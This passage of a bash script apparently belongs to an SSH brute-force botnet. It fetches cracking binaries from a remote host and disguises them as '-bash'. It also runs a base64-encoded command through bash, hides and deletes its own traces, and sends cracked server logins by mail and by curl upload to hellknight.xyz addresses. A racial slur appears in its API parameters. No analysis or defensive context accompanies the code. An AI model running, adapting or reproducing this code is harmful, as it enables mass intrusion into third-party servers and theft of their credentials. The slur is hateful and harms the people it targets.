-c upgrade) if [ ! -x "./spirit/-bash" ]; then wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz sleep 2 count=1 else count=$("./spirit/-bash" 2>/dev/null | grep -i upgrade | tail -n1 | grep -c upgrade) if [ "$count" -eq 1 ]; then wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz fi ./spirit/-bash 2>tmp1 x=$(tail -n2 tmp1 | tr -d '\n' | sed 's/[[:space:]]*$//' | sed 's/\x1b\[[0-9;]*m//g') rm -Rf tmp1 if [[ "$x" == *"Spirit Pro"* ]]; then echo "" else wget "$host/spirit-$arch.tgz" -O ./tmp.tgz;tar -zxf tmp.tgz;rm -Rf tmp.tgz fi fi sed -i 's/ /:/' pass_files/pass.lst rm -rf filtered.txt ./spirit/-bash banner -H ./i --threads 256 1>/dev/null 2>/dev/null cat b.lst |cut -d':' -f1,2 > ./i rm -Rf b.lst if [ "$arch" == "x86_64" ]; then ./spirit/-bash -l pass_files/pass.lst -H ./i -c "$brute_cmd" brute -j 250 --block=true else ./spirit/-bash -l pass_files/pass.lst -H ./i -c "$brute_cmd" brute -j 100 --block=true fi rm -Rf ips.txt i pass_files/$pass_file ips.lst pass.lst b.lst 2>/dev/null fi if [ "$brute_type" == "prg75" ]; then download "$host/prg75" ./-bash chmod +sx ./-bash mv pass_files/pass.lst ./pass.txt rm -Rf pass_files echo "num_threads=500" > config.ini echo "command=1" >> config.ini echo "custom_command=\"echo ZWNobyAiUFJPQzokKG5wcm9jIDI+IC9kZXYvbnVsbCkgVU5BTUU6JCh1bmFtZSAtYSAyPiAvZGV2L251bGwpIgo= |base64 -d |bash\"" >> config.ini echo "verbose=0" >> config.ini ./-bash & sleep 30s hideshit rm -Rf ./-bash i pass_files/$pass_file ips.lst pass.lst ips.txt pass.txt config.ini 2>/dev/null sleep 45s hideshit sleep 20s rm -Rf ./-bash i pass_files/$pass_file ips.lst pass.lst ips.txt pass.txt ./-bash config.ini 2>/dev/null hideshit wait fi if [ "$brute_type" == "haiduc" ]; then mkdir ./$brute_type/ 2>/dev/null download "$host/haiduc" ./$brute_type/-bash chmod +sx ./$brute_type/-bash ./$brute_type/-bash $brute_threads -f i pass_files/$pass_file $port "$brute_cmd" & sleep 30s rm -Rf ./$brute_type/ i pass_files/$pass_file 2>/dev/null wait fi sleep $sleep_time echo -e " ${YELLOW}---------------------------Killing Bruter Pids-------------------------${RESET}" killall -9 pass_files 2>/dev/null pkill -f pass_files 2>/dev/null sleep $sleep_time echo -e " ${YELLOW}---------------------------Clearing Vuln List---------------------------${RESET}" if [ "$brute_type" == "haiduc" ]; then if [ -f "sparte.txt" ]; then cat sparte.txt |sort |uniq | tr ':' ' ' | awk '{print $1":"$2":"$3":"$5" PROC:"$7" TYPE:"$9 }' > filtered.txt rm -rf sparte.txt fi fi if [ "$brute_type" == "prg" ]; then if [ -f "ssh_vuln" ]; then cat ssh_vuln | grep -v -e 'i-i57hue27' | grep -e "GNU/Linux" -e FreeBSD -e ppc -e "This account is currently not available" | awk '{ip=$2; port=$4; $2=""; print ip ":" port ":" $0}' | sort | uniq >> filtered.txt rm -rf ssh_vuln fi fi if [ "$brute_type" == "prg75" ]; then if [ -f "vuln.txt" ]; then cat vuln.txt |sort |uniq | tr ':' ' ' | awk '{print $2":"$3":"$4":"$5" PROC:"$7" TYPE:"$9" HOSTNAME:"$10" KERNEL:"$11" ARCH:"$23}' > filtered.txt rm -rf vuln.txt fi fi if [ "$brute_type" == "spirit1" ]; then if [ -f "found.lst" ]; then cat found.lst | grep -e "GNU/Linux" |grep -v "This account is currently not available" | awk '{ split($1, a, /:/); $1 = a[3]":"a[4]":"a[1]":"a[2]; print}' | sort | uniq >> filtered.txt rm -rf found.* fi fi if [[ -f "filtered.txt" && -s "filtered.txt" ]]; then sleep $sleep_time echo -e " ${YELLOW}---------------------------Generating POST-ID---------------------------${RESET}" if [ -z "$MYIP" ]; then postid=$(whoami)@$IP else postid=$(whoami)@$MYIP fi sleep $sleep_time echo -e " ${YELLOW}--------------------------Uploading Vulns List--------------------------${RESET}" if [ -s "filtered.txt" ]; then sed -i '1s/^/Subject: Server Results\n/' filtered.txt sendmail "scan@hellknight.xyz" < filtered.txt 2>/dev/null mail -s "Server Results" "scan@hellknight.xyz" < filtered.txt 2>/dev/null fi cp filtered.txt $(cat /etc/machine-id) upload=$(./curl -A 'curl/7.85.0' -s -m200 -F f=@./$(cat /etc/machine-id) "http://api.hellknight.xyz:8880/api2.php?endpoint=upload&dirty=fucking.sand.niggers&host=$(uname -n)" ) ircmsg="$(uname -n)_$(wc -l ./$(cat /etc/machine-id) |cut -d' ' -f1)" ./curl -s "$host/$api?endpoint=sendmessage&dirty=fucking.sand.niggers&message=$ircmsg" -A 'curl/7.85.0' if [ "$upload" == "success" ]; then sleep $sleep_time echo -e " ${YELLOW}---------------------------Removing Vuln List---------------------------${RESET}" rm -rf filtered.txt rm -Rf ./$(cat /etc/machine-id) else sleep $sleep_time echo -e " ${YELLOW}---------------------------Mailing Vuln List----------------------------${RESET}" sed -i '1s/^/Subject: Server Information\n/' filtered.txt sendmail "scan@hellknight.xyz" < filtered.txt 2>/dev/null sed -i '1d' filtered.txt 2> /dev/null mail -s "Server Information" "scan@hellknight.xyz" < filtered.txt 2>/dev/null rm -Rf filtered.txt ./$(cat /etc/machine-id) fi fi rm -rf pass_files/$pass_file pass_files/user pass_files/pass filtered.txt ./$(cat /etc/machine-id) get_random_port echo -e " ${YELLOW}-------------------------Thankyou For Scanning-------------------------${RESET}" done done